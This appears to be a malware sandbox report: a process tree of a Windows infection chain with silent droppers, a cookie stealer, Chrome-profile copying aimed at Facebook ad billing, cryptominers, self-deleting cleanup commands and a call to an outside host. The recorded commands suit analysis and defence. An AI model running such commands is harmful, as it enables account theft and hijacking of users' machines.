C:\Users\Admin\AppData\Local\Temp\ewh4vmzj2xz\qsw5jx0ynyd.exe"C:\Users\Admin\AppData\Local\Temp\ewh4vmzj2xz\qsw5jx0ynyd.exe" /ustwo INSTALL15⤵PID:4144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "qsw5jx0ynyd.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ewh4vmzj2xz\qsw5jx0ynyd.exe" & exit16⤵PID:4988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "qsw5jx0ynyd.exe" /f17⤵
- Kills process with taskkill
PID:4264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wcahncytk5o\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wcahncytk5o\Setup3310.exe" /Verysilent /subid=57715⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\is-GUQ7I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-GUQ7I.tmp\Setup3310.tmp" /SL5="$505F4,138429,56832,C:\Users\Admin\AppData\Local\Temp\wcahncytk5o\Setup3310.exe" /Verysilent /subid=57716⤵PID:6820
-
C:\Users\Admin\AppData\Local\Temp\is-MCVP8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MCVP8.tmp\Setup.exe" /Verysilent17⤵PID:7432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\si3gwwup0hx\app.exe"C:\Users\Admin\AppData\Local\Temp\si3gwwup0hx\app.exe" /8-2315⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\si3gwwup0hx\app.exe"C:\Users\Admin\AppData\Local\Temp\si3gwwup0hx\app.exe" /8-2316⤵PID:5992
-
-
-
C:\Users\Admin\AppData\Local\Temp\ravul24wjpz\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ravul24wjpz\vpn.exe" /silent /subid=48215⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\is-3QAI9.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3QAI9.tmp\vpn.tmp" /SL5="$20516,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ravul24wjpz\vpn.exe" /silent /subid=48216⤵PID:7780
-
-
-
C:\Users\Admin\AppData\Local\Temp\0h54py1goa3\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\0h54py1goa3\setup_10.2_us3.exe" /silent15⤵PID:5468
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\O6P4X0OX1C\setups.exe"C:\Users\Admin\AppData\Local\Temp\O6P4X0OX1C\setups.exe" ll12⤵
- Executes dropped EXE
PID:6632 -
C:\Users\Admin\AppData\Local\Temp\is-BCDIJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BCDIJ.tmp\setups.tmp" /SL5="$20342,1873631,71168,C:\Users\Admin\AppData\Local\Temp\O6P4X0OX1C\setups.exe" ll13⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:7232
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
PID:6956 -
C:\Users\Admin\AppData\Local\Temp\is-FK22I.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-FK22I.tmp\lylal220.tmp" /SL5="$20336,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"12⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\is-40BVT.tmp\ysAGEL.exe"C:\Users\Admin\AppData\Local\Temp\is-40BVT.tmp\ysAGEL.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6064 -
C:\Program Files\Java\RLUKRNKDKY\irecord.exe"C:\Program Files\Java\RLUKRNKDKY\irecord.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:7808 -
C:\Users\Admin\AppData\Local\Temp\is-PC3FV.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-PC3FV.tmp\irecord.tmp" /SL5="$30658,5922518,66560,C:\Program Files\Java\RLUKRNKDKY\irecord.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:6384 -
C:\Program Files (x86)\i-record\i-record.exe"C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e9-3dab0-9e8-6ebb2-5096e6b1f70ae\Byrymasudu.exe"C:\Users\Admin\AppData\Local\Temp\e9-3dab0-9e8-6ebb2-5096e6b1f70ae\Byrymasudu.exe"14⤵
- Executes dropped EXE
PID:7840
-
-
C:\Users\Admin\AppData\Local\Temp\90-b49bd-6fe-8599d-cb5565acd9177\Mashukitogi.exe"C:\Users\Admin\AppData\Local\Temp\90-b49bd-6fe-8599d-cb5565acd9177\Mashukitogi.exe"14⤵
- Executes dropped EXE
PID:7824 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rl4unpqa.eup\gaooo.exe & exit15⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\rl4unpqa.eup\gaooo.exeC:\Users\Admin\AppData\Local\Temp\rl4unpqa.eup\gaooo.exe16⤵PID:6416
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7436
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:6892
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bj0nvg0s.rta\google-game.exe & exit15⤵PID:6100
-
C:\Users\Admin\AppData\Local\Temp\bj0nvg0s.rta\google-game.exeC:\Users\Admin\AppData\Local\Temp\bj0nvg0s.rta\google-game.exe16⤵PID:8132
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install17⤵PID:7352
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m2u0bplx.nj3\jg8_8qyu.exe & exit15⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\m2u0bplx.nj3\jg8_8qyu.exeC:\Users\Admin\AppData\Local\Temp\m2u0bplx.nj3\jg8_8qyu.exe16⤵PID:3412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4spm5jo.kyg\wwfvd.exe & exit15⤵PID:7924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Executes dropped EXE
PID:5772
-
-
C:\Users\Admin\AppData\Local\Temp\m4spm5jo.kyg\wwfvd.exeC:\Users\Admin\AppData\Local\Temp\m4spm5jo.kyg\wwfvd.exe16⤵PID:7952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\m4spm5jo.kyg\wwfvd.exe" & del C:\ProgramData\*.dll & exit17⤵PID:1732
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wwfvd.exe /f18⤵
- Kills process with taskkill
PID:6664
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:7820
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdfw4xjz.x03\askinstall31.exe & exit15⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\bdfw4xjz.x03\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\bdfw4xjz.x03\askinstall31.exe16⤵PID:5344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mrcm33ie.d4z\GcleanerWW.exe /mixone & exit15⤵PID:900
-
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\XOoRXgN90WGr.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\XOoRXgN90WGr.exe"11⤵
- Executes dropped EXE
PID:6988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6536
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"11⤵
- Executes dropped EXE
PID:7008 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"12⤵PID:6336
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx12⤵PID:6612
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:7336
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx14⤵PID:4588
-
-
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.comInfinita.exe.com x14⤵PID:6120
-
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.comC:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x15⤵PID:5624
-
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exeC:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe16⤵PID:6904
-
C:\Users\Admin\Videos\xmrmin.exe"C:\Users\Admin\Videos\xmrmin.exe"17⤵PID:5424
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"18⤵PID:6448
-
-
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"18⤵PID:6864
-
-
-
C:\Users\Admin\Videos\ethminer.exe"C:\Users\Admin\Videos\ethminer.exe"17⤵PID:5512
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"18⤵PID:6248
-
-
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"18⤵PID:5328
-
-
-
C:\Users\Admin\Videos\111.exe"C:\Users\Admin\Videos\111.exe"17⤵PID:5984
-
-
C:\Users\Admin\Videos\Vickybuild.exe"C:\Users\Admin\Videos\Vickybuild.exe"17⤵PID:6336
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"18⤵PID:2600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Scossa.vstm18⤵PID:7956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe19⤵PID:3776
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6904 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"17⤵PID:6180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 690418⤵
- Kills process with taskkill
PID:6760
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 318⤵PID:2560
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3014⤵
- Runs ping.exe
PID:5648
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6868 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:6244
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6472
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"11⤵PID:6860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\x2aw3wlz5uu\vpn.exe"C:\Users\Admin\AppData\Local\Temp\x2aw3wlz5uu\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
PID:5984 -
C:\Users\Admin\AppData\Local\Temp\is-29RQ2.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-29RQ2.tmp\vpn.tmp" /SL5="$104B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\x2aw3wlz5uu\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6932
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:7552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:8004
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:208
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:1504
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:4212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rjatwsidjjv\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\rjatwsidjjv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
PID:6088 -
C:\Users\Admin\AppData\Local\Temp\is-O6EF6.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-O6EF6.tmp\IBInstaller_97039.tmp" /SL5="$303B6,9978391,721408,C:\Users\Admin\AppData\Local\Temp\rjatwsidjjv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3920 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\is-GI5JC.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-GI5JC.tmp\{app}\vdi_compiler"10⤵
- Executes dropped EXE
PID:6160 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-GI5JC.tmp\{app}\vdi_compiler.exe"11⤵PID:1240
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:2832
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1equtjdfieg\ebgk3ugky5a.exe"C:\Users\Admin\AppData\Local\Temp\1equtjdfieg\ebgk3ugky5a.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5976 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1equtjdfieg\ebgk3ugky5a.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1equtjdfieg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617727987 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6332
-
-
-
C:\Users\Admin\AppData\Local\Temp\3kwlusyy2s3\ec2eowpfcms.exe"C:\Users\Admin\AppData\Local\Temp\3kwlusyy2s3\ec2eowpfcms.exe"8⤵
- Executes dropped EXE
PID:5944 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3kwlusyy2s3\ec2eowpfcms.exe"9⤵PID:6468
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:6592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wqmq5s0gq22\app.exe"C:\Users\Admin\AppData\Local\Temp\wqmq5s0gq22\app.exe" /8-238⤵
- Executes dropped EXE
PID:5916 -
C:\Users\Admin\AppData\Local\Temp\wqmq5s0gq22\app.exe"C:\Users\Admin\AppData\Local\Temp\wqmq5s0gq22\app.exe" /8-239⤵PID:8188
-
-
-
C:\Users\Admin\AppData\Local\Temp\dvsasb12yzg\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\dvsasb12yzg\setup_10.2_us3.exe" /silent8⤵PID:400
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EVVZS2PEV8\setups.exe"C:\Users\Admin\AppData\Local\Temp\EVVZS2PEV8\setups.exe" ll5⤵
- Executes dropped EXE
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\is-J83E9.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-J83E9.tmp\setups.tmp" /SL5="$402BA,1873631,71168,C:\Users\Admin\AppData\Local\Temp\EVVZS2PEV8\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1596 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"5⤵PID:4464
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵PID:4640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3080 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc409d6e00,0x7ffc409d6e10,0x7ffc409d6e206⤵PID:2816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1664 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:5192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:26⤵PID:5184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2164 /prefetch:86⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:16⤵PID:5376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:16⤵PID:5456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:16⤵PID:5420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:16⤵PID:5552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:16⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:16⤵PID:5368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2152 /prefetch:86⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1372 /prefetch:86⤵PID:6968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:16⤵PID:6840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:16⤵PID:1352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,9289240728625296793,1459181610178125157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:16⤵PID:5088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:5884
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL5⤵PID:6620
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:7128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
PID:6680
-
-
